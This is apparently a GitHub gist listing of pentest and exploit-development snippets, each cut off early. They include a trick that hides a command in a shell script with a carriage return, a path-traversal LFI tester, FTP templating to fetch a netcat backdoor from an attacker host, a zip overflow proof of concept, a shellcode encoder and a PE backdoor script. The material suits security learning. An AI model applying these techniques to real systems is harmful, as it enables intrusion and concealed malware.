Kevin Kirsche kkirsche

kkirsche / cat-danger.py
Created Jan 8, 2020
The danger of just trusting the cat command
View cat-danger.py
#!/usr/bin/env python3
hidden_cmd = "echo 'You forgot to check `cat -A`!' > oops"
visible_cmd = "echo 'Hello world!'"
if __name__ == "__main__":
    with open("demo.sh", "w") as f:
        txt = "#!/bin/sh\n"
        txt += hidden_cmd + ";" + visible_cmd + " #\r" + visible_cmd + " " * (len(hidden_cmd) + 3) + "\n"
        f.write(txt)
kkirsche / arkham-week1.py
Last active Oct 1, 2019
Arkham Walkthrough
View arkham-week1.py
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
from pyDes import des, ECB, PAD_PKCS5
import hmac
def create_payload():
kkirsche / README.md
Last active Jul 29, 2019
Patch for rbenv's ree-1.8.7-2012.02 Installer
View README.md
View mount-shared-folders
#!/bin/bash
vmware-hgfsclient | while read folder; do
    vmwpath="/mnt/hgfs/${folder}"
    echo "[i] Mounting ${folder} (${vmwpath})"
    sudo mkdir -p "${vmwpath}"
    sudo umount -f "${vmwpath}" 2>/dev/null
    sudo vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "${vmwpath}"
done
View lfi-tester.py
import requests
import webbrowser
# formatted using Black
# https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/
url = "http://www.testpage.com?page="
LFI = "../../../../../../../../../"
pages = [
kkirsche / split-file.py
Created Oct 17, 2018
Antivirus Checking
View split-file.py
#!/usr/bin/env python
from jinja2 import Template
from subprocess import call
lhost = '192.168.102.69'
binary = 'ncx99.exe'
split_num = 50
tmpl = Template('''open {{ lhost }} 21
BINARY
{%- for f in split_files %}
View msf-hex-to-bin.sh
#!/bin/sh
cat "${1}" | tr -d '\\x' | xxd -r -p > "${1}.bin"
View 01-poc.py
#!/usr/bin/env python
# Original Author : corelanc0d3r
# Pocython Author: d3cc3pt10n
# Note: Python 3 doesn't work, Python 2 does...weird!
filename = 'pycorelanboom.zip'
filesize = '\xe4\x0f'
# Local file header
# 30 bytes
kkirsche / ascii-shellcode-encoder.py
Created Oct 2, 2018 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract arguments finding algorithm.
View ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output its ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
kkirsche / backdoor.py
Last active Sep 20, 2018
Backdoor a PE file
View backdoor.py
#!/usr/bin/env python2
import mmap
import os
import pefile
def align(val_to_align, alignment):
    return ((val_to_align + alignment - 1) / alignment) * alignment